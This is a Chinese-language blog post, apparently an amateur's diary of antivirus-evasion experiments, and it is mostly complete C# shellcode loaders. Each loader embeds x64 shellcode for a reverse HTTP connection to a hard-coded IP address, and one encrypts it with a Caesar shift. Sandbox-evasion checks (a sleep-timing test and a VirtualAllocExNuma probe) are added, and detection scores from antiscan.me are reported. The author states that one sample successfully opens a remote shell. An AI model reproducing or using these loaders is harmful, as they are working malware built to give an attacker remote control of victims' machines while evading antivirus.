黑客学徒日记-失败的动态免杀

上一篇:https://whale3070.github.io/2021/07/02/%E9%BB%91%E5%AE%A2%E5%AD%A6%E5%BE%92%E6%97%A5%E8%AE%B0-shellcode%E6%B7%B7%E6%B7%86-%E5%87%AF%E6%92%92/

样本四:时间延时(10/26)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Net;
using System.Text;
using System.Threading;
namespace ConsoleApp1
{
	class Program
	{
		[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
		static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize,uint flAllocationType, uint flProtect);
		[DllImport("kernel32.dll")]
		static extern IntPtr CreateThread(IntPtr lpThreadAttributes,uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter,uint dwCreationFlags, IntPtr lpThreadId);
		[DllImport("kernel32.dll")]
		static extern UInt32 WaitForSingleObject(IntPtr hHandle,UInt32 dwMilliseconds);
		[DllImport("kernel32.dll")]
		static extern void Sleep(uint dwMilliseconds);
		static void Main(string[] args)
		{
			DateTime t1 = DateTime.Now;
			Sleep(2000);
			double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
			if(t2 < 1.5)
			{
			return;
			}
			byte[] buf = new byte[691] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x48,0x31,0xd2,0x51,0x65,0x48,0x8b,0x52,0x60,0x56,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x8b,0x72,0x50,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x44,0x8b,
0x40,0x20,0x49,0x01,0xd0,0x50,0x8b,0x48,0x18,0xe3,0x56,0x48,0xff,0xc9,0x4d,
0x31,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x48,0x31,0xc0,0x41,0xc1,0xc9,
0x0d,0xac,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,
0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x41,0x58,
0x41,0x58,0x5e,0x59,0x48,0x01,0xd0,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,
0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x69,
0x6e,0x65,0x74,0x00,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,
0x07,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,
0xc9,0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x00,0x00,0x00,0x00,0xff,0xd5,
0xe8,0x10,0x00,0x00,0x00,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x31,0x32,
0x38,0x2e,0x32,0x33,0x35,0x00,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0x1d,0x09,
0x00,0x00,0x4d,0x31,0xc9,0x53,0x53,0x6a,0x03,0x53,0x49,0xba,0x57,0x89,0x9f,
0xc6,0x00,0x00,0x00,0x00,0xff,0xd5,0xe8,0x88,0x00,0x00,0x00,0x2f,0x78,0x35,
0x36,0x54,0x5f,0x37,0x76,0x2d,0x2d,0x50,0x35,0x50,0x41,0x45,0x34,0x43,0x4c,
0x39,0x37,0x46,0x48,0x67,0x56,0x4b,0x71,0x76,0x4c,0x4d,0x6c,0x6e,0x63,0x78,
0x72,0x35,0x4a,0x4b,0x74,0x78,0x71,0x61,0x57,0x78,0x32,0x6b,0x52,0x33,0x63,
0x36,0x53,0x42,0x79,0x51,0x4e,0x6c,0x54,0x4e,0x51,0x69,0x36,0x51,0x41,0x57,
0x37,0x45,0x64,0x6d,0x6d,0x33,0x6e,0x62,0x43,0x63,0x59,0x38,0x67,0x55,0x74,
0x32,0x4e,0x61,0x4d,0x4e,0x67,0x34,0x48,0x47,0x75,0x58,0x73,0x68,0x51,0x6d,
0x75,0x6c,0x73,0x36,0x58,0x47,0x45,0x71,0x73,0x46,0x54,0x53,0x4a,0x78,0x73,
0x67,0x68,0x70,0x61,0x59,0x72,0x5f,0x54,0x54,0x71,0x63,0x4d,0x33,0x39,0x51,
0x46,0x53,0x78,0x4b,0x6f,0x68,0x50,0x6a,0x71,0x65,0x4b,0x4c,0x00,0x48,0x89,
0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x00,0x32,0xa8,0x84,
0x00,0x00,0x00,0x00,0x50,0x53,0x53,0x49,0xc7,0xc2,0xeb,0x55,0x2e,0x3b,0xff,
0xd5,0x48,0x89,0xc6,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x6a,0x1f,0x5a,0x52,0x68,
0x80,0x33,0x00,0x00,0x49,0x89,0xe0,0x6a,0x04,0x41,0x59,0x49,0xba,0x75,0x46,
0x9e,0x86,0x00,0x00,0x00,0x00,0xff,0xd5,0x4d,0x31,0xc0,0x53,0x5a,0x48,0x89,
0xf1,0x4d,0x31,0xc9,0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,0x2d,0x06,0x18,
0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,0x00,0x00,0x49,
0xba,0x44,0xf0,0x35,0xe0,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0xff,0xcf,0x74,
0x02,0xeb,0xaa,0xe8,0x55,0x00,0x00,0x00,0x53,0x59,0x6a,0x40,0x5a,0x49,0x89,
0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x00,0x10,0x00,0x00,0x49,0xba,0x58,0xa4,
0x53,0xe5,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0x93,0x53,0x53,0x48,0x89,0xe7,
0x48,0x89,0xf1,0x48,0x89,0xda,0x49,0xc7,0xc0,0x00,0x20,0x00,0x00,0x49,0x89,
0xf9,0x49,0xba,0x12,0x96,0x89,0xe2,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,0x83,
0xc4,0x20,0x85,0xc0,0x74,0xb2,0x66,0x8b,0x07,0x48,0x01,0xc3,0x85,0xc0,0x75,
0xd2,0x58,0xc3,0x58,0x6a,0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,
0xd5 };

			int size = buf.Length;
			IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
			Marshal.Copy(buf, 0, addr, size);
			IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr,
			IntPtr.Zero, 0, IntPtr.Zero);
			WaitForSingleObject(hThread, 0xFFFFFFFF);
		}
	}
}

结果:https://antiscan.me/scan/new/result?id=pwzlP1YqmDsP

样本五:凯撒加密+时间延迟(7/26)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Net;
using System.Text;
using System.Threading;
namespace ConsoleApp1
{
	class Program
	{
		[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
		static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize,uint flAllocationType, uint flProtect);
		[DllImport("kernel32.dll")]
		static extern IntPtr CreateThread(IntPtr lpThreadAttributes,uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter,uint dwCreationFlags, IntPtr lpThreadId);
		[DllImport("kernel32.dll")]
		static extern UInt32 WaitForSingleObject(IntPtr hHandle,UInt32 dwMilliseconds);
		[DllImport("kernel32.dll")]
		static extern void Sleep(uint dwMilliseconds);
		static void Main(string[] args)
		{
			DateTime t1 = DateTime.Now;
			Sleep(2000);
			double t2 = DateTime.Now.Subtract(t1).TotalSeconds;
			if(t2 < 1.5)
			{
			return;
			}
			byte[] buf = new byte[748] {0xfe, 0x4a, 0x85, 0xe6, 0xf2, 0xea, 0xce, 0x02, 0x02, 0x02, 0x43, 0x53, 0x43, 0x52, 0x54, 0x4a, 0x33, 0xd4, 0x53, 0x67, 0x4a, 0x8d, 0x54, 0x62, 0x58, 0x4a, 0x8d, 0x54, 0x1a, 0x4a, 0x8d, 0x54, 0x22, 0x4a, 0x11, 0xb9, 0x4c, 0x4c, 0x4a, 0x8d, 0x74, 0x52, 0x4f, 0x33, 0xcb, 0x4a, 0x33, 0xc2, 0xae, 0x3e, 0x63, 0x7e, 0x04, 0x2e, 0x22, 0x43, 0xc3, 0xcb, 0x0f, 0x43, 0x03, 0xc3, 0xe4, 0xef, 0x54, 0x4a, 0x8d, 0x54, 0x22, 0x8d, 0x44, 0x3e, 0x43, 0x53, 0x4a, 0x03, 0xd2, 0x68, 0x83, 0x7a, 0x1a, 0x0d, 0x04, 0x11, 0x87, 0x74, 0x02, 0x02, 0x02, 0x8d, 0x82, 0x8a, 0x02, 0x02, 0x02, 0x4a, 0x87, 0xc2, 0x76, 0x69, 0x4a, 0x03, 0xd2, 0x52, 0x46, 0x8d, 0x42, 0x22, 0x4b, 0x03, 0xd2, 0x8d, 0x4a, 0x1a, 0xe5, 0x58, 0x4a, 0x01, 0xcb, 0x43, 0x8d, 0x36, 0x8a, 0x4a, 0x03, 0xd8, 0x4f, 0x33, 0xcb, 0x4a, 0x33, 0xc2, 0xae, 0x43, 0xc3, 0xcb, 0x0f, 0x43, 0x03, 0xc3, 0x3a, 0xe2, 0x77, 0xf3, 0x4e, 0x05, 0x4e, 0x26, 0x0a, 0x47, 0x3b, 0xd3, 0x77, 0xda, 0x5a, 0x46, 0x8d, 0x42, 0x26, 0x4b, 0x03, 0xd2, 0x68, 0x43, 0x8d, 0x0e, 0x4a, 0x46, 0x8d, 0x42, 0x1e, 0x4b, 0x03, 0xd2, 0x43, 0x8d, 0x06, 0x8a, 0x43, 0x5a, 0x43, 0x5a, 0x4a, 0x03, 0xd2, 0x60, 0x5b, 0x5c, 0x43, 0x5a, 0x43, 0x5b, 0x43, 0x5c, 0x4a, 0x85, 0xee, 0x22, 0x43, 0x54, 0x01, 0xe2, 0x5a, 0x43, 0x5b, 0x5c, 0x4a, 0x8d, 0x14, 0xeb, 0x4d, 0x01, 0x01, 0x01, 0x5f, 0x4a, 0x33, 0xdd, 0x55, 0x4b, 0xc0, 0x79, 0x6b, 0x70, 0x6b, 0x70, 0x67, 0x76, 0x02, 0x43, 0x58, 0x4a, 0x8b, 0xe3, 0x4b, 0xc9, 0xc4, 0x4e, 0x79, 0x28, 0x09, 0x01, 0xd7, 0x55, 0x55, 0x4a, 0x8b, 0xe3, 0x55, 0x5c, 0x4f, 0x33, 0xc2, 0x4f, 0x33, 0xcb, 0x55, 0x55, 0x4b, 0xbc, 0x3c, 0x58, 0x7b, 0xa9, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0xea, 0x11, 0x02, 0x02, 0x02, 0x33, 0x3b, 0x34, 0x30, 0x33, 0x38, 0x3a, 0x30, 0x39, 0x35, 0x30, 0x33, 0x35, 0x34, 0x02, 0x5c, 0x4a, 0x8b, 0xc3, 0x4b, 0xc9, 0xc2, 0x1f, 0x0b, 0x02, 0x02, 0x4f, 0x33, 0xcb, 0x55, 0x55, 0x6c, 0x05, 0x55, 0x4b, 0xbc, 0x59, 0x8b, 0xa1, 0xc8, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0xea, 0xc4, 0x02, 0x02, 0x02, 0x31, 0x75, 0x4d, 0x72, 0x44, 0x6e, 0x63, 0x44, 0x33, 0x67, 0x79, 0x66, 0x33, 0x6c, 0x4a, 0x55, 0x51, 0x48, 0x58, 0x4b, 0x4d, 0x47, 0x79, 0x52, 0x65, 0x57, 0x39, 0x4e, 0x4e, 0x4a, 0x49, 0x37, 0x4a, 0x33, 0x76, 0x65, 0x53, 0x45, 0x6f, 0x4c, 0x72, 0x74, 0x72, 0x4a, 0x63, 0x66, 0x4a, 0x79, 0x3b, 0x59, 0x68, 0x52, 0x74, 0x61, 0x68, 0x38, 0x53, 0x65, 0x3b, 0x4a, 0x4e, 0x70, 0x7a, 0x6e, 0x4a, 0x54, 0x53, 0x7b, 0x49, 0x72, 0x36, 0x5c, 0x4c, 0x52, 0x68, 0x50, 0x73, 0x6b, 0x68, 0x54, 0x72, 0x73, 0x34, 0x59, 0x5c, 0x3a, 0x53, 0x65, 0x3a, 0x5c, 0x3b, 0x2f, 0x4f, 0x5b, 0x3b, 0x47, 0x73, 0x6b, 0x32, 0x74, 0x50, 0x72, 0x78, 0x59, 0x63, 0x47, 0x57, 0x72, 0x4f, 0x67, 0x66, 0x74, 0x37, 0x76, 0x4a, 0x37, 0x73, 0x4a, 0x55, 0x5c, 0x58, 0x6a, 0x7b, 0x6a, 0x64, 0x75, 0x2f, 0x6f, 0x5c, 0x78, 0x48, 0x4f, 0x37, 0x47, 0x54, 0x63, 0x61, 0x70, 0x48, 0x4c, 0x6b, 0x44, 0x70, 0x34, 0x77, 0x7b, 0x74, 0x63, 0x50, 0x5b, 0x33, 0x59, 0x3b, 0x72, 0x7b, 0x50, 0x3a, 0x6f, 0x7c, 0x6e, 0x46, 0x38, 0x6f, 0x47, 0x35, 0x4f, 0x7b, 0x33, 0x4d, 0x6b, 0x44, 0x65, 0x4f, 0x6a, 0x36, 0x7b, 0x72, 0x7b, 0x6a, 0x5a, 0x4e, 0x7a, 0x46, 0x66, 0x55, 0x37, 0x59, 0x5c, 0x64, 0x36, 0x36, 0x74, 0x7c, 0x02, 0x4a, 0x8b, 0xc3, 0x55, 0x5c, 0x43, 0x5a, 0x4f, 0x33, 0xcb, 0x55, 0x4a, 0xba, 0x02, 0x34, 0xaa, 0x86, 0x02, 0x02, 0x02, 0x02, 0x52, 0x55, 0x55, 0x4b, 0xc9, 0xc4, 0xed, 0x57, 0x30, 0x3d, 0x01, 0xd7, 0x4a, 0x8b, 0xc8, 0x6c, 0x0c, 0x61, 0x4a, 0x8b, 0xf3, 0x6c, 0x21, 0x5c, 0x54, 0x6a, 0x82, 0x35, 0x02, 0x02, 0x4b, 0x8b, 0xe2, 0x6c, 0x06, 0x43, 0x5b, 0x4b, 0xbc, 0x77, 0x48, 0xa0, 0x88, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0x4f, 0x33, 0xc2, 0x55, 0x5c, 0x4a, 0x8b, 0xf3, 0x4f, 0x33, 0xcb, 0x4f, 0x33, 0xcb, 0x55, 0x55, 0x4b, 0xc9, 0xc4, 0x2f, 0x08, 0x1a, 0x7d, 0x01, 0xd7, 0x87, 0xc2, 0x77, 0x21, 0x4a, 0xc9, 0xc3, 0x8a, 0x15, 0x02, 0x02, 0x4b, 0xbc, 0x46, 0xf2, 0x37, 0xe2, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0x4a, 0x01, 0xd1, 0x76, 0x04, 0xed, 0xac, 0xea, 0x57, 0x02, 0x02, 0x02, 0x55, 0x5b, 0x6c, 0x42, 0x5c, 0x4b, 0x8b, 0xd3, 0xc3, 0xe4, 0x12, 0x4b, 0xc9, 0xc2, 0x02, 0x12, 0x02, 0x02, 0x4b, 0xbc, 0x5a, 0xa6, 0x55, 0xe7, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0x4a, 0x95, 0x55, 0x55, 0x4a, 0x8b, 0xe9, 0x4a, 0x8b, 0xf3, 0x4a, 0x8b, 0xdc, 0x4b, 0xc9, 0xc2, 0x02, 0x22, 0x02, 0x02, 0x4b, 0x8b, 0xfb, 0x4b, 0xbc, 0x14, 0x98, 0x8b, 0xe4, 0x02, 0x02, 0x02, 0x02, 0x01, 0xd7, 0x4a, 0x85, 0xc6, 0x22, 0x87, 0xc2, 0x76, 0xb4, 0x68, 0x8d, 0x09, 0x4a, 0x03, 0xc5, 0x87, 0xc2, 0x77, 0xd4, 0x5a, 0xc5, 0x5a, 0x6c, 0x02, 0x5b, 0x4b, 0xc9, 0xc4, 0xf2, 0xb7, 0xa4, 0x58, 0x01, 0xd7
			};
			for(int i = 0; i < buf.Length; i++)
			{
			buf[i] = (byte)(((uint)buf[i] - 2) & 0xFF);
			}
			int size = buf.Length;
			IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
			Marshal.Copy(buf, 0, addr, size);
			IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr,IntPtr.Zero, 0, IntPtr.Zero);
			WaitForSingleObject(hThread, 0xFFFFFFFF);
		}
	}
}

结果

https://antiscan.me/scan/new/result?id=aHjdiKij5O7X

对比使用样本三(只使用凯撒加密的结果)(4/26),增加了时间延时函数,延时2秒。检出率不降反增(7/26)。

评论:AVG: detected
Avast: Win64:MalwareX-gen [Trj]
这个之前是只做了静态shellcode凯撒加密检查不出的。

样本六:未模拟的API(9/26)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Net;
using System.Text;
using System.Threading;
namespace ConsoleApp1
{
	class Program
	{
		[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
		static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize,uint flAllocationType, uint flProtect);
		[DllImport("kernel32.dll")]
		static extern IntPtr CreateThread(IntPtr lpThreadAttributes,uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter,uint dwCreationFlags, IntPtr lpThreadId);
		[DllImport("kernel32.dll")]
		static extern UInt32 WaitForSingleObject(IntPtr hHandle,UInt32 dwMilliseconds);
		[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
		static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress,uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);
		[DllImport("kernel32.dll")]
		static extern IntPtr GetCurrentProcess();

		static void Main(string[] args)
		{
byte[] buf = new byte[596] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x4
…… 
…… 
…… 
0x00,0x59,0x49,0xc7,0xc2,0xf0,0xb5,0xa2,0x56,0xff,0xd5 };
			IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4,0);
			if(mem == null)
			{
			return;
			}
			int size = buf.Length;
			IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
			Marshal.Copy(buf, 0, addr, size);
			IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr,
			IntPtr.Zero, 0, IntPtr.Zero);
			WaitForSingleObject(hThread, 0xFFFFFFFF);
		}
	}
}

结果

此样本能成功反弹shell(功能无问题)。

https://antiscan.me/scan/new/result?id=10o8CsiRhwKV

相比于样本一,增加了1种杀软的检出。Eset NOD32: a variant of MSIL/Rozena.N trojan

也就是说,检出率没有降低,反而增加了。这个技术没有用了。

参考资料

https://github.com/LordNoteworthy/al-khaser

Charlotte:完全不会被检测到的Shellcode启动器

https://hackingandsecurity.blogspot.com/2017/07/bypassing-antivirus-with-ten-lines-of.html